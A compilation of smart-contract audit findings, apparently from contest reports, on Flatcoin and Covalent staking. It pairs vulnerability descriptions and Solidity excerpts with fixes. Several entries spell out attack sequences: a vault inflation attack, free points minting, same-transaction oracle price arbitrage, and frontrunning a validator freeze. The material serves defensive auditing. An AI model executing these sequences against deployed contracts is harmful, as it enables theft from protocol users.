```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n\\nWhen `profitLossTotal` is positive value, then `stableCollateralTotal` will decrease.\\nWhen `profitLossTotal` is negative value, then `stableCollateralTotal` will increase.\\nAssume the following:\\n```\\nstableCollateralTotal = 90e18\\n_globalPositions = { \\n sizeOpenedTotal: 100e18, \\n lastPrice: 1800e18, \\n}\\nA new position is to be opened with additionalSize = 5e18. \\nfresh price=2000e18\\n```\\n\\nWe explain it in two situations:\\n`checkSkewMax` is called before `updateGlobalPositionData`.\\n```\\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 90e18 \\n = 1.16667e18 < skewFractionMax(1.2e18)\\nso checkSkewMax will be passed.\\n```\\n\\n`checkSkewMax` is called after `updateGlobalPositionData`.\\n```\\nIn updateGlobalPositionData: \\nPerpMath._profitLossTotal calculates\\nprofitLossTotal = _globalPositions.sizeOpenedTotal * (int256(price) - int256(globalPosition.lastPrice)) / int256(price) \\n = 100e18 * (2000e18 - 1800e18) / 2000e18 = 100e18 * 200e18 /2000e18 \\n = 10e18 \\n_updateStableCollateralTotal(-profitLossTotal) will deduct 10e18 from stableCollateralTotal. \\nso stableCollateralTotal = 90e18 - 10e18 = 80e18. \\n\\nNow, checkSkewMax is called: \\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 80e18 \\n = 1.3125e18 > skewFractionMax(1.2e18)\\n```\\n\\nTherefore, this new position should not be allowed to open, as this will only make the system more skewed towards the long side.
```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:--- vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n+++ vault.checkSkewMax(0); //0 means that vault.updateGlobalPositionData has added announcedOpen.additionalSize.\\n// rest of code// rest of code\\n }\\n```\\n
The `stableCollateralTotal` used by `checkSkewMax` is the value of the total profit that has not yet been settled, which is old value. In this way, when the price of collateral rises, it will cause the system to be more skewed towards the long side.
```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n
Oracle will not failover as expected during liquidation
medium
Oracle will not failover as expected during liquidation. If the liquidation cannot be executed due to the revert described in the following scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.\\nThe liquidators have the option to update the Pyth price during liquidation. If the liquidators do not intend to update the Pyth price during liquidation, they have to call the second `liquidate(uint256 tokenId)` function at Line 85 below directly, which does not have the `updatePythPrice` modifier.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n\\nIt was understood from the protocol team that the rationale for allowing the liquidators to execute a liquidation without updating the Pyth price is to ensure that the liquidations will work regardless of Pyth's working status, in which case Chainlink is the fallback, and the last oracle price will be used for the liquidation.\\nHowever, upon further review, it was found that the fallback mechanism within the FlatCoin protocol does not work as expected by the protocol team.\\nAssume that Pyth is down. In this case, no one would be able to fetch the latest off-chain price from Pyth network and update Pyth on-chain contract. As a result, the prices stored in the Pyth on-chain contract will become outdated and stale.\\nWhen liquidation is executed in FlatCoin protocol, the following `_getPrice` function will be executed to fetch the price. Line 107 below will fetch the latest price from Chainlink, while Line 108 below will fetch the last available price on the Pyth on-chain contract. When the Pyth on-chain prices have not been updated for a period of time, the deviation between `onchainPrice` and `offchainPrice` will widen till a point where `diffPercent > maxDiffPercent` and a revert will occur at Line 113 below, thus blocking the liquidation from being carried out. As a result, the liquidation mechanism within the FlatCoin protocol will stop working.\\nAlso, the protocol team's goal of allowing the liquidators to execute a liquidation without updating the Pyth price to ensure that the liquidations will work regardless of Pyth's working status will not be achieved.\\n```\\nFile: OracleModule.sol\\n /// @notice Returns the latest 18 decimal price of asset from either Pyth.network or Chainlink.\\n /// @dev It verifies the Pyth network price against Chainlink price (ensure that it is within a threshold).\\n /// @return price The latest 18 decimal price of asset.\\n /// @return timestamp The timestamp of the latest price.\\n function _getPrice(uint32 maxAge) internal view returns (uint256 price, uint256 timestamp) {\\n (uint256 onchainPrice, uint256 onchainTime) = _getOnchainPrice(); // will revert if invalid\\n (uint256 offchainPrice, uint256 offchainTime, bool offchainInvalid) = _getOffchainPrice();\\n bool offchain;\\n\\n uint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\n uint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\n if (diffPercent > maxDiffPercent) revert FlatcoinErrors.PriceMismatch(diffPercent);\\n\\n if (offchainInvalid == false) {\\n // return the freshest price\\n if (offchainTime >= onchainTime) {\\n price = offchainPrice;\\n timestamp = offchainTime;\\n offchain = true;\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n\\n // Check that the timestamp is within the required age\\n if (maxAge < type(uint32).max && timestamp + maxAge < block.timestamp) {\\n revert FlatcoinErrors.PriceStale(\\n offchain ? FlatcoinErrors.PriceSource.OffChain : FlatcoinErrors.PriceSource.OnChain\\n );\\n }\\n }\\n```\\n
Consider implementing a feature to allow the protocol team to disable the price deviation check so that the protocol team can disable it in the event that Pyth network is down for an extended period of time.
The liquidation mechanism is the core component of the protocol and is important to the solvency of the protocol. If the liquidation cannot be executed due to the revert described in the above scenario, underwater positions and bad debt accumulate in the protocol threaten the solvency of the protocol.
```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n
Large amounts of points can be minted virtually without any cost
medium
Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value and create unfairness among other protocol users.\\nWhen depositing stable collateral, the LPs only need to pay for the keeper fee. The keeper fee will be sent to the caller who executed the deposit order.\\nWhen withdrawing stable collateral, the LPs need to pay for the keeper fee and withdraw fee. However, there is an instance where one does not need to pay for the withdrawal fee. Per the condition at Line 120 below, if the `totalSupply` is zero, this means that it is the final/last withdrawal. In this case, the withdraw fee will not be applicable and remain at zero.\\n```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n\\nWhen LPs deposit rETH and mint UNIT, the protocol will mint points to the depositor's account as per Line 84 below.\\nAssume that the vault has been newly deployed on-chain. Bob is the first LP to deposit rETH into the vault. Assume for a period of time (e.g., around 30 minutes), there are no other users depositing into the vault except for Bob.\\nBob could perform the following actions to mint points for free:\\nBob announces a deposit order to deposit 100e18 rETH. Paid for the keeper fee. (Acting as a LP).\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the deposit order and mints 100e18 UNIT (Exchange rate 1:1). Protocol also mints 100e18 points to Bob's account. Bob gets back the keeper fee. (Acting as Keeper)\\nImmediately after his `executeDeposit` TX, Bob inserts an "announce withdraw order" TX to withdraw all his 100e18 UNIT and pay for the keeper fee.\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the withdraw order and receives back his initial investment of 100e18 rETH. Since he is the only LP in the protocol, it is considered the final/last withdrawal, and he does not need to pay any withdraw fee. He also got back his keeper fee. (Acting as Keeper)\\nEach attack requires 20 seconds (10 + 10) to be executed. Bob could rinse and repeat the attack until he was no longer the only LP in the system, where he had to pay for the withdraw fee, which might make this attack unprofitable.\\nIf Bob is the only LP in the system for 30 minutes, he could gain 9000e18 points ((30 minutes / 20 seconds) * 100e18 ) for free as Bob could get back his keeper fee and does not incur any withdraw fee. The only thing that Bob needs to pay for is the gas fee, which is extremely cheap on L2 like Base.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n..SNIP..\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n..SNIP..\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n..SNIP..\\n // Mint points\\n IPointsModule pointsModule = IPointsModule(vault.moduleAddress(FlatcoinModuleKeys._POINTS_MODULE_KEY));\\n pointsModule.mintDeposit(_account, _announcedDeposit.depositAmount);\\n```\\n
One approach that could mitigate this risk is also to impose withdraw fee for the final/last withdrawal so that no one could abuse this exception to perform any attack that was once not profitable due to the need to pay withdraw fee.\\nIn addition, consider deducting the points once a position is closed or reduced in size so that no one can attempt to open and adjust/close a position repeatedly to obtain more points.
Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value from the protocol and create unfairness among other protocol users.
```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n
Vault Inflation Attack
medium
Malicious users can perform an inflation attack against the vault to steal the assets of the victim.\\nA malicious user can perform a donation to execute a classic first depositor/ERC4626 inflation Attack against the FlatCoin vault. The general process of this attack is well-known, and a detailed explanation of this attack can be found in many of the resources such as the following:\\nIn short, to kick-start the attack, the malicious user will often usually mint the smallest possible amount of shares (e.g., 1 wei) and then donate significant assets to the vault to inflate the number of assets per share. Subsequently, it will cause a rounding error when other users deposit.\\nHowever, in Flatcoin, there are various safeguards in place to mitigate this attack. Thus, one would need to perform additional steps to workaround/bypass the existing controls.\\nLet's divide the setup of the attack into two main parts:\\nMalicious user mint 1 mint of share\\nDonate or transfer assets to the vault to inflate the assets per share\\nPart 1 - Malicious user mint 1 mint of share\\nUsers could attempt to mint 1 wei of share. However, the validation check at Line 79 will revert as the share minted is less than `MIN_LIQUIDITY` = 10_000. However, this minimum liquidation requirement check can be bypassed.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n\\nFirst, Bob mints 10000 wei shares via `executeDeposit` function. Next, Bob withdraws 9999 wei shares via the `executeWithdraw`. In the end, Bob successfully owned only 1 wei share, which is the prerequisite for this attack.\\nPart 2 - Donate or transfer assets to the vault to inflate the assets per share\\nThe vault tracks the number of collateral within the state variables. Thus, simply transferring rETH collateral to the vault directly will not work, and the assets per share will remain the same.\\nTo work around this, Bob creates a large number of accounts (with different wallet addresses). He could choose any or both of the following methods to indirectly transfer collateral to the LP pool/vault to inflate the assets per share:\\nOpen a large number of leveraged long positions with the intention of incurring large amounts of losses. The long positions' losses are the gains of the LPs, and the collateral per share will increase.\\nOpen a large number of leveraged long positions till the max skew of 120%. Thus, this will cause the funding rate to increase, and the long will have to pay the LPs, which will also increase the collateral per share.\\nTriggering rounding error\\nThe `stableCollateralPerShare` will be inflated at this point. Following is the formula used to determine the number of shares minted to the depositor.\\nIf the `depositAmount` by the victim is not sufficiently large enough, the amount of shares minted to the depositor will round down to zero.\\n```\\n_collateralPerShare = (stableBalance * (10 ** decimals())) / totalSupply;\\n_liquidityMinted = (depositAmount * (10 ** decimals())) / _collateralPerShare\\n```\\n\\nFinally, the attacker withdraws their share from the pool. Since they are the only ones with any shares, this withdrawal equals the balance of the vault. This means the attacker also withdraws the tokens deposited by the victim earlier.
A `MIN_LIQUIDITY` amount of shares needs to exist within the vault to guard against a common inflation attack.\\nHowever, the current approach of only checking if the `totalSupply() < MIN_LIQUIDITY` is not sufficient, and could be bypassed by making use of the withdraw function.\\nA more robust approach to ensuring that there is always a minimum number of shares to guard against inflation attack is to mint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2).
Malicous users could steal the assets of the victim.
```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n
Long traders unable to withdraw their assets
medium
Whenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, the protocol will be bricked. As a result, the margin deposited and gain of the long traders can no longer be withdrawn and the LPs cannot withdraw their collateral, leading to a loss of assets for the users.\\nPer Line 97 below, if the collateral balance is less than the tracked balance, the `_getCollateralNet` invariant check will revert.\\n```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation("collateralNet");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n\\nAssume that:\\nBob's long position: Margin = 50 ETH\\nAlice's LP: Deposited = 50 ETH\\nCollateral Balance = 100 ETH\\nTracked Balance = 100 ETH (Stable Collateral Total = 50 ETH, Margin Deposited Total = 50 ETH)\\nAssume that Bob's long position gains a profit of 51 ETH.\\nThe following actions will trigger the `updateGlobalPositionData` function internally: executeOpen, executeAdjust, executeClose, and liquidation.\\nWhen the `FlatcoinVault.updateGlobalPositionData` function is triggered to update the global position data:\\n```\\nprofitLossTotal = 51 ETH (gain by long)\\n\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 50 ETH + 0 + 51 ETH = 101 ETH\\n\\n_updateStableCollateralTotal(-51 ETH)\\nnewStableCollateralTotal = stableCollateralTotal + _stableCollateralAdjustment\\nnewStableCollateralTotal = 50 ETH + (-51 ETH) = -1 ETH\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0;\\nstableCollateralTotal = 0\\n```\\n\\nIn this case, the state becomes as follows:\\nCollateral Balance = 100 ETH\\nTracked Balance = 101 ETH (Stable Collateral Total = 0 ETH, Margin Deposited Total = 101 ETH)\\nNotice that the Collateral Balance and Tracked Balance are no longer in sync. As such, the revert will occur when the `_getCollateralNet` invariant checks are performed.\\nWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, this issue will occur, and the protocol will be bricked. The margin deposited and gain of the long traders can no longer be withdrawn from the protocol. The LPs also cannot withdraw their collateral.\\nThe reason is that the `_getCollateralNet` invariant checks are performed in all functions of the protocol that can be accessed by users (listed below):\\nDeposit\\nWithdraw\\nOpen Position\\nAdjust Position\\nClose Position\\nLiquidate
Currently, when the loss of the LP is more than the existing `stableCollateralTotal`, the loss will be capped at zero, and it will not go negative. In the above example, the `stableCollateralTotal` is 50, and the loss is 51. Thus, the `stableCollateralTotal` is set to zero instead of -1.\\nThe loss of LP and the gain of the trader should be aligned or symmetric. However, this is not the case in the current implementation. In the above example, the gain of traders is 51, while the loss of LP is 50, which results in a discrepancy here.\\nTo fix the issue, the loss of LP and the gain of the trader should be aligned. For instance, in the above example, if the loss of LP is capped at 50, then the profit of traders must also be capped at 50.\\nFollowing is a high-level logic of the fix:\\n```\\nIf (profitLossTotal > stableCollateralTotal): // (51 > 50) => True\\n profitLossTotal = stableCollateralTotal // profitLossTotal = 50\\n \\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal // 50 + 0 + 50 = 100\\n \\nnewStableCollateralTotal = stableCollateralTotal + (-profitLossTotal) // 50 + (-50) = 0\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0; // stableCollateralTotal = 0\\n```\\n\\nThe comment above verifies that the logic is working as intended.
Loss of assets for the users. Since the protocol is bricked due to revert, the long traders are unable to withdraw their deposited margin and gain and the LPs cannot withdraw their collateral.
```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation("collateralNet");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n
Oracle can return different prices in same transaction
medium
The Pyth network oracle contract allows to submit and read two different prices in the same transaction. This can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.\\n`OracleModule.sol` uses Pyth network as the primary source of price feeds. This oracle works in the following way:\\nA dedicated network keeps track of the latest price consensus, together with the timestamp.\\nThis data is queried off-chain and submitted to the on-chain oracle.\\nIt is checked that the data submitted is valid and the new price data is stored.\\nNew requests for the latest price will now return the data submitted until a more recent price is submitted.\\nOne thing to note is that the Pyth network is constantly updating the latest price (every 400ms), so when a new price is submitted on-chain it is not necessary that the price is the latest one. Otherwise, the process of querying the data off-chain, building the transaction, and submitting it on-chain would be required to be done with a latency of less than 400ms, which is not feasible. This makes it possible to submit two different prices in the same transaction and, thus, fetch two different prices in the same transaction.\\nThis can be used to create some arbitrage opportunities that can make a profit with no risk.\\nHow this can be exploited\\nAn example of how this can be exploited, and showed in the PoC, would be:\\nCreate a small leverage position.\\nAnnounce an adjustment order to increase the size of the position by some amount.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is higher than the first one.\\nExecute the adjustment order sending the first price.\\nExecute the limit close order sending the second price.\\nThe result is approximately a profit of\\n```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n\\nNote: For simplicity, we do not take into account the initial size of the position, which in any case can be insignificant compared to the adjustment size. The keeper fee is also not included, as is the owner of the position that is executing the orders.\\nThe following things are required to make a profit out of this attack:\\nSubmit the orders before other keepers. This can be easily achieved, as there are not always enough incentives to execute the orders as soon as possible.\\nObtain a positive delta between two prices in the time frame where the orders are executable that is greater than twice the trade fees. This can be very feasible, especially in moments of high volatility. Note also, that this requirement can be lowered to a delta greater than once the trade fees if we take into account that there is currently another vulnerability that allows to avoid paying fees for the limit order.\\nIn the case of not being able to obtain the required delta or observing that a keeper has already submitted a transaction to execute them before the delta is obtained, the user can simply cancel the limit order and will have just the adjustment order executed.\\nAnother possible strategy would pass through the following steps:\\nCreate a leverage position.\\nAnnounce another leverage position with the same size.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is lower than the first one.\\nExecute the limit close order sending the first price.\\nExecute the open order sending the second price.\\nThe result in this case is having a position with the same size as the original one, but having either lowered the `position.lastPrice` or getting a profit from the original position, depending on how the price has moved since the original position was opened.\\n\\n
```\\nFile: OracleModule.sol\\n FlatcoinStructs.OffchainOracle public offchainOracle; // Offchain Pyth network oracle\\n\\n// Add the line below\\n uint256 public lastOffchainUpdate;\\n\\n (// rest of code)\\n\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n// Add the line below\\n if (lastOffchainUpdate >= block.timestamp) return;\\n// Add the line below\\n lastOffchainUpdate = block.timestamp;\\n// Add the line below\\n\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n```\\n
Different oracle prices can be fetched in the same transaction, which can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.
```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n
OperationalStaking may not possess enough CQT for the last withdrawal
medium
Both `_sharesToTokens` and `_tokensToShares` round down instead of rounding off against the user. This can result in users withdrawing few weis more than they should, which in turn would make the last CQT transfer from the contract revert due to insufficient balance.\\nWhen users `stake`, the shares they will receive is calculated via _tokensToShares:\\n```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n\\nSo the rounding will be against the user, or zero if the user provided the right amount of CQT.\\nWhen users unstake, their shares are decreased by\\n```\\n function _sharesToTokens(\\n uint128 sharesN,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n }\\n```\\n\\nSo it is possible to `stake` and `unstake` such amounts, that would leave dust amount of shares on user's balance after their full withdrawal. However, dust amounts can not be withdrawn due to the check in _redeemRewards:\\n```\\n require(\\n effectiveAmount >= REWARD_REDEEM_THRESHOLD,\\n "Requested amount must be higher than redeem threshold"\\n );\\n```\\n\\nBut, if the user does not withdraw immediately, but instead does it after the multiplier is increased, the dust he received from rounding error becomes withdrawable, because his `totalUnlockedValue` becomes greater than `REWARD_REDEEM_THRESHOLD`.\\nSo the user will end up withdrawing more than their `initialStake + shareOfRewards`, which means, if the rounding after all other operations stays net-zero for the protocol, there won't be enough CQT for the last CQT withdrawal (be it `transferUnstakedOut`, `redeemRewards`, or redeemCommission).\\nFoundry PoC
`_sharesToTokens` and `_tokensToShares`, instead of rounding down, should always round off against the user.
Victim's transactions will keep reverting unless they figure out that they need to decrease their withdrawal amount.
```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n
Frontrunning validator freeze to withdraw tokens
medium
Covalent implements a freeze mechanism to disable malicious Validators, this allows the protocol to block all interactions with a validator when he behaves maliciously. Covalent also implements a timelock to ensure tokens are only withdraw after a certain amount of time. After the cooldown ends, tokens can always be withdrawn.\\nFollowing problem arise now: because the tokens can always be withdrawn, a malicious Validator can listen for a potential "freeze" transaction in the mempool, front run this transaction to unstake his tokens and withdraw them after the cooldown end.\\nAlmost every action on the Operational Staking contract checks if the validator is frozen or not:\\n```\\n require(!v.frozen, "Validator is frozen");\\n```\\n\\nThe methods transferUnstakedOut() and recoverUnstaking() are both not checking for this, making the unstake transaction front runnable. Here are the only checks of transferUnstakedOut():\\n```\\nrequire(validatorId < validatorsN, "Invalid validator");\\n require(_validators[validatorId].unstakings[msg.sender].length > unstakingId, "Unstaking does not exist");\\n Unstaking storage us = _validators[validatorId].unstakings[msg.sender][unstakingId];\\n require(us.amount >= amount, "Unstaking has less tokens");\\n```\\n\\nThis makes following attack possible:\\nValidator cheats and gets rewarded fees.\\nProtocol notices the misbehavior and initiates a Freeze transaction\\nValidator sees the transaction and starts a unstake() transaction with higher gas.\\nValidator gets frozen, but the unstaking is already done\\nValidator waits for cooldown and withdraws tokens.\\nNow the validator has gained unfairly obtained tokens and withdrawn his stake.
Implement a check if validator is frozen on `transferUnstakedOut()` and `recoverUnstaking()`, and revert transaction if true.\\nIf freezing all unstakings is undesirable (e.g. not freezing honest unstakes), the sponsor may consider storing the unstake timestamp as well:\\nStore the unstaking block number for each unstake.\\nFreeze the validator from a certain past block only, only unstakings that occur from that block onwards will get frozen.
Malicious validators can front run freeze to withdraw tokens.
```\\n require(!v.frozen, "Validator is frozen");\\n```\\n
